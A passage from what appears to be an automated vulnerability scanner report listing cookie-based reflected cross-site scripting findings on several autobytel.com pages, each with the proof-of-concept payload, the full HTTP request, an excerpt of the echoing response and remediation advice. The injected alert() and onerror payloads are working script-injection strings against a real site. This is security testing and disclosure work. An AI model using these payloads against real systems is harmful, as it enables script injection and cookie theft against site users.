GET /car-pictures.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=b6c37"%3balert(1)//3474e0c2a81; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 43553
Expires: Mon, 24 Jan 2011 23:54:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:54:12 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:54:11 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:54:11 GMT;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
op7 = "research|";
           
           //s.prop9 = "research|Search Engine Optimization Project|13148";
           s.prop10 = "research|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "b6c37";alert(1)//3474e0c2a81||";
           
           s.prop14 = "car pictures page : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "research|||rec|sky|ban|
...[SNIP]...

4.2020. http://www.autobytel.com/car-reviews.htm [BDATALIST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-reviews.htm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21f6d"%3balert(1)//09994992f77 was submitted in the BDATALIST cookie. This input was echoed as 21f6d";alert(1)//09994992f77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /car-reviews.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c421f6d"%3balert(1)//09994992f77; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:47:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:47:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:47:12 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:47:12 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 49230


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c421f6d";alert(1)//09994992f77";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "483BAABF-A247-FB44-8C83710A
...[SNIP]...

4.2021. http://www.autobytel.com/car-reviews.htm [ENTERED_POSTAL_CODE_VCH cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-reviews.htm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce5e4"%3balert(1)//c24be204b0b was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as ce5e4";alert(1)//c24be204b0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /car-reviews.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=ce5e4"%3balert(1)//c24be204b0b; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:54:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:54:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:54:18 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:54:18 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 49230


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
rchhome|";
           
           //s.prop9 = "researchhome|Search Engine Optimization Project|13148";
           s.prop10 = "researchhome|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "ce5e4";alert(1)//c24be204b0b||";
           
           s.prop14 = "car reviews page : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "researchhome|||rec|sky|b
...[SNIP]...

4.2022. http://www.autobytel.com/content/buy/finance/index.cfm/action/Calculator [BDATALIST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/buy/finance/index.cfm/action/Calculator

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2143"%3balert(1)//07a6e47bb9b was submitted in the BDATALIST cookie. This input was echoed as b2143";alert(1)//07a6e47bb9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/buy/finance/index.cfm/action/Calculator HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4b2143"%3balert(1)//07a6e47bb9b; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:31:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:31:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:31:33 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:31:33 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 35815


<!-- begin: index.cfm -->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengr
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4b2143";alert(1)//07a6e47bb9b";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "47AC8092-D1BC-5AFE-EA65B824
...[SNIP]...

4.2023. http://www.autobytel.com/content/buy/finance/index.cfm/action/Calculator [ENTERED_POSTAL_CODE_VCH cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/buy/finance/index.cfm/action/Calculator

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b9db"%3balert(1)//ddc5d696033 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 1b9db";alert(1)//ddc5d696033 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/buy/finance/index.cfm/action/Calculator HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=1b9db"%3balert(1)//ddc5d696033; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:33:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:33:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:33:52 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:33:52 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 35825


<!-- begin: index.cfm -->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengr
...[SNIP]...
//s.prop7 = "finins|";
           
           //s.prop9 = "finins|Search Engine Optimization Project|13148";
           s.prop10 = "finins|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "1b9db";alert(1)//ddc5d696033||";
           
           s.prop14 = "buy|finance|calculator : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "finins||||sky|ban|
...[SNIP]...

4.2024. http://www.autobytel.com/content/buy/finance/index.cfm/action/Calculator [PV_CT cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/buy/finance/index.cfm/action/Calculator

Issue detail

The value of the PV_CT cookie is copied into the HTML document as plain text between tags. The payload 46134<img%20src%3da%20onerror%3dalert(1)>abf1bae3adb was submitted in the PV_CT cookie. This input was echoed as 46134<img src=a onerror=alert(1)>abf1bae3adb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /content/buy/finance/index.cfm/action/Calculator HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=246134<img%20src%3da%20onerror%3dalert(1)>abf1bae3adb; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
server-error: true
Content-Length: 43522
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:32:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:32:32 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:32:32 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:32:32 GMT;path=/


<!-- begin: index.cfm -->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengr
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 246134<img src=a onerror=alert(1)>abf1bae3adb cannot be converted to a number.
</h1>
...[SNIP]...

4.2025. http://www.autobytel.com/content/buy/index.cfm [BDATALIST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/buy/index.cfm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d2fa"%3balert(1)//593170551a3 was submitted in the BDATALIST cookie. This input was echoed as 9d2fa";alert(1)//593170551a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/buy/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c49d2fa"%3balert(1)//593170551a3; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:29:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:29:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:29:51 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:29:51 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 57692


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c49d2fa";alert(1)//593170551a3";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "479CCD90-ECB3-F82E-73E75041
...[SNIP]...

4.2026. http://www.autobytel.com/content/buy/index.cfm [ENTERED_POSTAL_CODE_VCH cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/buy/index.cfm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65796"%3balert(1)//be62058463a was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 65796";alert(1)//be62058463a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/buy/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=65796"%3balert(1)//be62058463a; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 57730
Expires: Mon, 24 Jan 2011 23:36:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:36:08 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=65796;expires=Wed, 16-Jan-2041 23:36:08 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:36:08 GMT;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
= "research|All";
           
           //s.prop9 = "research|Search Engine Optimization Project|13148";
           s.prop10 = "research|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "65796";alert(1)//be62058463a||";
           
           s.prop14 = "search : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "research|||rec|sky|ban|Search Engi
...[SNIP]...

4.2027. http://www.autobytel.com/content/buy/index.cfm [PV_CT cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/buy/index.cfm

Issue detail

The value of the PV_CT cookie is copied into the HTML document as plain text between tags. The payload 621ab<img%20src%3da%20onerror%3dalert(1)>0e7859121e3 was submitted in the PV_CT cookie. This input was echoed as 621ab<img src=a onerror=alert(1)>0e7859121e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /content/buy/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2621ab<img%20src%3da%20onerror%3dalert(1)>0e7859121e3; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response (redirected)

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
server-error: true
Content-Length: 65412
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:33:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:33:24 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:33:24 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:33:24 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 2621ab<img src=a onerror=alert(1)>0e7859121e3 cannot be converted to a number.
</h1>
...[SNIP]...

4.2028. http://www.autobytel.com/content/buy/warranty/index.cfm [BDATALIST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/buy/warranty/index.cfm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 808f3"%3balert(1)//bcba1c35209 was submitted in the BDATALIST cookie. This input was echoed as 808f3";alert(1)//bcba1c35209 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/buy/warranty/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
